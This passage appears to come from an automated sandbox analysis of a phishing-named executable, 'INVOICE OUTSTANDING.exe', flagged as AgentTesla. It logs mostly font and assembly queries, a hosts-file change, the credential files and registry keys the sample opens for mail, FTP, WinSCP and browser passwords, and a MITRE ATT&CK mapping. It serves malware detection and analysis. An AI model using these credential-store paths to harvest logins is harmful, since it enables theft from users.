            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies the hosts file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		211
            Process Injection            		1
            File and Directory Permissions Modification            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts2
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		1
            Credentials in Registry            		114
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		Exfiltration Over Bluetooth1
            Non-Standard Port            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Scheduled Task/Job            		Logon Script (Windows)1
            Registry Run Keys / Startup Folder            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager311
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration1
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
            Obfuscated Files or Information            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer11
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
            Software Packing            		LSA Secrets131
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Masquerading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items131
            Virtualization/Sandbox Evasion            		DCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job211
            Process Injection            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Hidden Files and Directories            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
